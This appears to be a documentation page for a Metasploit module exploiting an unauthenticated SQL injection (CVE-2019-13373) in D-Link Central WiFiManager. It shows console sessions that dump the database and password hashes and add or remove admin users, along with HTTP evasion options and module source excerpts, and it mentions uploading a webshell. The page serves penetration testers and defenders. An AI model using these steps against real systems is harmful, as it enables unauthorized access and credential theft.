D-Link Central WiFiManager SQL injection - Metasploit
This page contains detailed information about how to use the auxiliary/sqli/dlink/dlink_central_wifimanager_sqli metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: D-Link Central WiFiManager SQL injection
Module: auxiliary/sqli/dlink/dlink_central_wifimanager_sqli
Source code: modules/auxiliary/sqli/dlink/dlink_central_wifimanager_sqli.rb
Disclosure date: 2019-07-06
Last modification time: 2021-08-27 17:15:33 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2019-13373
This module exploits a SQLi vulnerability found in D-Link Central WiFi Manager CWM(100) before v1.03R0100_BETA6. The vulnerability is an exposed API endpoint that allows the execution of SQL queries without authentication, using this vulnerability, it's possible to retrieve usernames and password hashes of registered users, device configuration, and other data, it's also possible to add users, or edit database informations.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
msf > use auxiliary/sqli/dlink/dlink_central_wifimanager_sqli
msf auxiliary(dlink_central_wifimanager_sqli) > show targets
... a list of targets ...
msf auxiliary(dlink_central_wifimanager_sqli) > set TARGET target-id
msf auxiliary(dlink_central_wifimanager_sqli) > show options
... show and set options ...
msf auxiliary(dlink_central_wifimanager_sqli) > exploit
Required Options
- RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
Knowledge Base
Vulnerable Application
This module exploits a vulnerability in Dlink Central WifiManager (CWM-100), found in versions lower than v1.03R0100_BETA6, allowing unauthenticated users to execute arbitary SQL queries.
This module has 3 actions:
Action | Description |
---|---|
SQLI_DUMP | Data retrieval* |
ADD_ADMIN | Creation of an admin user |
REMOVE_ADMIN | Removal of an admin user |
* : each table is saved in the loot directory in CSV format, credentials (password hashes) are saved as creds for future cracking.
Has been tested with 1.03r098.
Verification Steps
- Download the vulnerable software, and install it
- Run the vulnerable software, downloadable from here.
- direct download link: `ftp://ftp2.dlink.com/SOFTWARE/CENTRAL_WIFI_MANAGER/CENTRAL_WI-FI_MANAGER_1.03.zip
- Reproduction steps
- Run
msfconsole
- set rhosts ...
- set action ...
check
orexploit
- should work as in the scenarios below
Actions
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > show actions
Auxiliary actions:
Name Description
---- -----------
ADD_ADMIN Add an administrator user
REMOVE_ADMIN Remove a user
SQLI_DUMP Retrieve all the data from the database
Options
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > show options
Module options (auxiliary/sqli/dlink/dlink_central_wifimanager_sqli):
Name Current Setting Required Description
---- --------------- -------- -----------
Admin_Password anything no The password of the user to add/edit
Admin_Username red0xff no The username of the user to add/remove
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.1.223 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to DLink CWM-100
VHOST no HTTP server virtual host
Scenarios
This module has both check
and run
functions.
Retrieving all the data from the database
msf5 > use auxiliary/sqli/dlink/dlink_central_wifimanager_sqli
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > set action SQLI_DUMP
action => SQLI_DUMP
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > set rhosts 192.168.1.223
rhosts => 192.168.1.223
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > check
[+] 192.168.1.223:443 - The target is vulnerable.
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > run
[*] Running module against 192.168.1.223
[+] Target seems vulnerable
[+] DBMS version: PostgreSQL 9.1.0, compiled by Visual C++ build 1500, 32-bit
[*] Enumerating tables
[+] grouptossltable saved to /home/redouane/.msf4/loot/20200828180148_default_192.168.1.223_dlink.http_187571.csv
[+] paypalsettingtable saved to /home/redouane/.msf4/loot/20200828180149_default_192.168.1.223_dlink.http_642251.csv
[+] ordertable saved to /home/redouane/.msf4/loot/20200828180149_default_192.168.1.223_dlink.http_944954.csv
...
[+] tempstationtable saved to /home/redouane/.msf4/loot/20200828180505_default_192.168.1.223_dlink.http_577215.csv
[+] Saved credentials for admin
[+] Saved credentials for red0xff
[+] usertable saved to /home/redouane/.msf4/loot/20200828180153_default_192.168.1.223_dlink.http_608945.csv
...
[+] devicesnmpsecuritytable saved to /home/redouane/.msf4/loot/20200828180154_default_192.168.1.223_dlink.http_825556.csv
[*] Auxiliary module execution completed
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) >
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > creds
Credentials
===========
host origin service public private realm private_type JtR Format
---- ------ ------- ------ ------- ----- ------------ ----------
192.168.1.223 admin 21232f297a57a5a743894a0e4a801fc3 Nonreplayable hash raw-md5
192.168.1.223 red0xff f0e166dc34d14d6c228ffac576c9a43c Nonreplayable hash raw-md5
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) >
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > loot
Loot
====
host service type name content info path
---- ------- ---- ---- ------- ---- ----
192.168.1.223 dlink.http biggrouptable.csv application/csv /home/redouane/.msf4/loot/20200828180503_default_192.168.1.223_dlink.http_360290.csv
192.168.1.223 dlink.http devicetable.csv application/csv /home/redouane/.msf4/loot/20200828180503_default_192.168.1.223_dlink.http_230830.csv
...
ult_192.168.1.223_dlink.http_878195.csv
192.168.1.223 dlink.http devicesnmpsecuritytable.csv application/csv /home/redouane/.msf4/loot/20200828180506_default_192.168.1.223_dlink.http_086271.csv
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) >
Adding an admin user/changing the password of a user
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > set action ADD_ADMIN
action => ADD_ADMIN
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > set Admin_Username msfadmin
Admin_Username => msfadmin
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > set Admin_Password msfadmin
Admin_Password => msfadmin
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > run
[*] Running module against 192.168.1.223
[+] Target seems vulnerable
[*] User not found on the target, inserting
[*] Auxiliary module execution completed
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > set Admin_Password msfpassword
Admin_Password => msfpassword
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > run
[*] Running module against 192.168.1.223
[*] Trying to detect installed version
[+] Target seems vulnerable
[*] User already exists, updating the password
[*] Auxiliary module execution completed
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) >
Deleting an administrator user
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > set action REMOVE_ADMIN
action => REMOVE_USER
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > set Admin_Username red0xff
Admin_Username => red0xff
msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > run
[*] Running module against 192.168.1.223
[+] Target seems vulnerable
[*] Auxiliary module execution completed
Going further
It is possible to upload arbitary files to the target system using queries of the form (copy ... to ...), but using full paths, the attacker must know the path of the webroot to upload a webshell this way.
Go back to menu.
Msfconsole Usage
Here is how the sqli/dlink/dlink_central_wifimanager_sqli auxiliary module looks in the msfconsole:
msf6 > use auxiliary/sqli/dlink/dlink_central_wifimanager_sqli
msf6 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > show info
Name: D-Link Central WiFiManager SQL injection
Module: auxiliary/sqli/dlink/dlink_central_wifimanager_sqli
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2019-07-06
Provided by:
M3 <M3@ZionLab from DBAppSecurity>
Redouane NIBOUCHA <[email protected]>
Available actions:
Name Description
---- -----------
ADD_ADMIN Add an administrator user
REMOVE_ADMIN Remove an administrator user
SQLI_DUMP Retrieve all the data from the database
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password of the user to add/edit
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to DLink CWM-100
USERNAME no The username of the user to add/remove
VHOST no HTTP server virtual host
Description:
This module exploits a SQLi vulnerability found in D-Link Central
WiFi Manager CWM(100) before v1.03R0100_BETA6. The vulnerability is
an exposed API endpoint that allows the execution of SQL queries
without authentication, using this vulnerability, it's possible to
retrieve usernames and password hashes of registered users, device
configuration, and other data, it's also possible to add users, or
edit database informations.
References:
https://nvd.nist.gov/vuln/detail/CVE-2019-13373
https://unh3x.github.io/2019/02/21/D-link-(CWM-100)-Multiple-Vulnerabilities/
Module Options
This is a complete list of options available in the sqli/dlink/dlink_central_wifimanager_sqli auxiliary module:
msf6 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > show options
Module options (auxiliary/sqli/dlink/dlink_central_wifimanager_sqli):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password of the user to add/edit
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to DLink CWM-100
USERNAME no The username of the user to add/remove
VHOST no HTTP server virtual host
Auxiliary action:
Name Description
---- -----------
SQLI_DUMP Retrieve all the data from the database
Advanced Options
Here is a complete list of advanced options supported by the sqli/dlink/dlink_central_wifimanager_sqli auxiliary module:
msf6 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > show advanced
Module advanced options (auxiliary/sqli/dlink/dlink_central_wifimanager_sqli):
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN WORKSTATION yes The domain to use for Windows authentication
DigestAuthIIS true no Conform to IIS, should work for most servers. Only set to false for non-IIS servers
FingerprintCheck true no Conduct a pre-exploit fingerprint verification
HttpClientTimeout no HTTP connection and receive timeout
HttpPassword no The HTTP password to specify for authentication
HttpRawHeaders no Path to ERB-templatized raw headers to append to existing headers
HttpTrace false no Show the raw HTTP requests and responses
HttpTraceColors red/blu no HTTP request and response colors for HttpTrace (unset to disable)
HttpTraceHeadersOnly false no Show HTTP headers only in HttpTrace
HttpUsername no The HTTP username to specify for authentication
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
SqliDelay 1.0 no The delay to sleep on time-based blind SQL injections
UserAgent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) no The User-Agent header to use for all requests
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the sqli/dlink/dlink_central_wifimanager_sqli module can do:
msf6 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > show actions
Auxiliary actions:
Name Description
---- -----------
ADD_ADMIN Add an administrator user
REMOVE_ADMIN Remove an administrator user
SQLI_DUMP Retrieve all the data from the database
Evasion Options
Here is the full list of possible evasion options supported by the sqli/dlink/dlink_central_wifimanager_sqli auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
HTTP::header_folding false no Enable folding of HTTP headers
HTTP::method_random_case false no Use random casing for the HTTP method
HTTP::method_random_invalid false no Use a random invalid, HTTP method for request
HTTP::method_random_valid false no Use a random, but valid, HTTP method for request
HTTP::pad_fake_headers false no Insert random, fake headers into the HTTP request
HTTP::pad_fake_headers_count 0 no How many fake headers to insert into the HTTP request
HTTP::pad_get_params false no Insert random, fake query string variables into the request
HTTP::pad_get_params_count 16 no How many fake query string variables to insert into the request
HTTP::pad_method_uri_count 1 no How many whitespace characters to use between the method and uri
HTTP::pad_method_uri_type space no What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
HTTP::pad_post_params false no Insert random, fake post variables into the request
HTTP::pad_post_params_count 16 no How many fake post variables to insert into the request
HTTP::pad_uri_version_count 1 no How many whitespace characters to use between the uri and version
HTTP::pad_uri_version_type space no What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
HTTP::uri_dir_fake_relative false no Insert fake relative directories into the uri
HTTP::uri_dir_self_reference false no Insert self-referential directories into the uri
HTTP::uri_encode_mode hex-normal no Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
HTTP::uri_fake_end false no Add a fake end of URI (eg: /%20HTTP/1.0/../../)
HTTP::uri_fake_params_start false no Add a fake start of params to the URI (eg: /%3fa=b/../)
HTTP::uri_full_url false no Use the full URL for all HTTP requests
HTTP::uri_use_backslashes false no Use back slashes instead of forward slashes in the uri
HTTP::version_random_invalid false no Use a random invalid, HTTP version for request
HTTP::version_random_valid false no Use a random, but valid, HTTP version for request
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Failed to send HTTP request
Here is a relevant code snippet related to the "Failed to send HTTP request" error message:
73: res.body[%r{<column>(.+)</column>}m, 1] || ''
74: else
75: if res
76: check_error = Exploit::CheckCode::Safe
77: else
78: check_error = Exploit::CheckCode::Unknown('Failed to send HTTP request')
79: end
80: '' # because a String is expected, this will make test_vulnerable to return false, but we will just get check_error
81: end
82: end
83: vulnerable_test = sqli.test_vulnerable
You must specify a username when adding a user
Here is a relevant code snippet related to the "You must specify a username when adding a user" error message:
123: end
124: end
125:
126: def check_admin_username
127: if datastore['USERNAME'].nil?
128: fail_with Failure::BadConfig, 'You must specify a username when adding a user'
129: elsif ['\\', '\''].any? { |c| datastore['USERNAME'].include?(c) }
130: fail_with Failure::BadConfig, 'Admin username cannot contain single quotes or backslashes'
131: end
132: end
133:
Admin username cannot contain single quotes or backslashes
Here is a relevant code snippet related to the "Admin username cannot contain single quotes or backslashes" error message:
125:
126: def check_admin_username
127: if datastore['USERNAME'].nil?
128: fail_with Failure::BadConfig, 'You must specify a username when adding a user'
129: elsif ['\\', '\''].any? { |c| datastore['USERNAME'].include?(c) }
130: fail_with Failure::BadConfig, 'Admin username cannot contain single quotes or backslashes'
131: end
132: end
133:
134: def add_user(sqli)
135: check_admin_username
User not found on the target, inserting
Here is a relevant code snippet related to the "User not found on the target, inserting" error message:
135: check_admin_username
136: admin_hash = Digest::MD5.hexdigest(datastore['PASSWORD'] || '')
137: user_exists_sql = "select count(1) from usertable where username='#{datastore['USERNAME']}'"
138: # check if user exists, if yes, just change his password
139: if sqli.run_sql(user_exists_sql).to_i == 0
140: print_status 'User not found on the target, inserting'
141: sqli.run_sql('insert into usertable(username,userpassword,level) values(' \
142: "'#{datastore['USERNAME']}', '#{admin_hash}', 1)")
143: else
144: print_status 'User already exists, updating the password'
145: sqli.run_sql("update usertable set userpassword='#{admin_hash}' where " \
Target does not seem to be vulnerable
Here is a relevant code snippet related to the "Target does not seem to be vulnerable" error message:
152: sqli.run_sql("delete from usertable where username='#{datastore['USERNAME']}'")
153: end
154:
155: def run
156: unless check == Exploit::CheckCode::Vulnerable
157: print_error 'Target does not seem to be vulnerable'
158: return
159: end
160: print_good 'Target seems vulnerable'
161: sqli = create_sqli(dbms: PostgreSQLi::Common, opts: { encoder: :base64 }) do |payload|
162: res = vulnerable_request(payload)
Failed to send HTTP request
Here is a relevant code snippet related to the "Failed to send HTTP request" error message:
161: sqli = create_sqli(dbms: PostgreSQLi::Common, opts: { encoder: :base64 }) do |payload|
162: res = vulnerable_request(payload)
163: if res && res.code == 200
164: res.body[%r{<column>(.+)</column>}m, 1] || ''
165: else
166: fail_with Failure::Unreachable, 'Failed to send HTTP request' unless res
167: fail_with Failure::NotVulnerable, "Got #{res.code} response code" unless res.code == 200
168: end
169: end
170: case action.name
171: when 'SQLI_DUMP'
Got <RES.CODE> response code
Here is a relevant code snippet related to the "Got <RES.CODE> response code" error message:
162: res = vulnerable_request(payload)
163: if res && res.code == 200
164: res.body[%r{<column>(.+)</column>}m, 1] || ''
165: else
166: fail_with Failure::Unreachable, 'Failed to send HTTP request' unless res
167: fail_with Failure::NotVulnerable, "Got #{res.code} response code" unless res.code == 200
168: end
169: end
170: case action.name
171: when 'SQLI_DUMP'
172: dump_data(sqli)
<ACTION.NAME> not defined
Here is a relevant code snippet related to the "<ACTION.NAME> not defined" error message:
171: when 'SQLI_DUMP'
172: dump_data(sqli)
173: when 'ADD_ADMIN'
174: add_user(sqli)
175: when 'REMOVE_ADMIN'
176: remove_user(sqli)
177: else
178: fail_with(Failure::BadConfig, "#{action.name} not defined")
179: end
180: end
181: end
Go back to menu.
Related Pull Requests
- #14734 Merged Pull Request: Rubocop recently landed modules
- #14067 Merged Pull Request: [GSoC] Module for CVE-2019-13375, and PostgreSQL support for the library
References
See Also
Check also the following modules related to this module:
- auxiliary/admin/http/dlink_dir_300_600_exec_noauth
- auxiliary/admin/http/dlink_dir_645_password_extractor
- auxiliary/admin/http/dlink_dsl320b_password_extractor
- auxiliary/admin/vxworks/dlink_i2eye_autoanswer
- auxiliary/scanner/http/dlink_dir_300_615_http_login
- auxiliary/scanner/http/dlink_dir_615h_http_login
- auxiliary/scanner/http/dlink_dir_session_cgi_http_login
- auxiliary/scanner/http/dlink_user_agent_backdoor
- exploit/linux/http/dlink_authentication_cgi_bof
- exploit/linux/http/dlink_command_php_exec_noauth
- exploit/linux/http/dlink_dcs_930l_authenticated_remote_command_execution
- exploit/linux/http/dlink_dcs931l_upload
- exploit/linux/http/dlink_diagnostic_exec_noauth
- exploit/linux/http/dlink_dir300_exec_telnet
- exploit/linux/http/dlink_dir605l_captcha_bof
- exploit/linux/http/dlink_dir615_up_exec
- exploit/linux/http/dlink_dir850l_unauth_exec
- exploit/linux/http/dlink_dsl2750b_exec_noauth
- exploit/linux/http/dlink_dspw110_cookie_noauth_exec
- exploit/linux/http/dlink_dspw215_info_cgi_bof
- exploit/linux/http/dlink_dwl_2600_command_injection
- exploit/linux/http/dlink_hedwig_cgi_bof
- exploit/linux/http/dlink_hnap_bof
- exploit/linux/http/dlink_hnap_header_exec_noauth
- exploit/linux/http/dlink_hnap_login_bof
- exploit/linux/http/dlink_upnp_exec_noauth
- exploit/linux/upnp/dlink_dir859_exec_ssdpcgi
- exploit/linux/upnp/dlink_dir859_subscribe_exec
- exploit/linux/upnp/dlink_upnp_msearch_exec
- exploit/windows/http/dlink_central_wifimanager_rce
- exploit/windows/tftp/dlink_long_filename
- auxiliary/scanner/http/manageengine_desktop_central_login
- exploit/windows/http/desktopcentral_deserialization
- exploit/windows/http/desktopcentral_file_upload
- exploit/windows/http/desktopcentral_statusupdate_upload
Authors
- M3@ZionLab from DBAppSecurity
- Redouane NIBOUCHA <rniboucha[at]yahoo.fr>
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.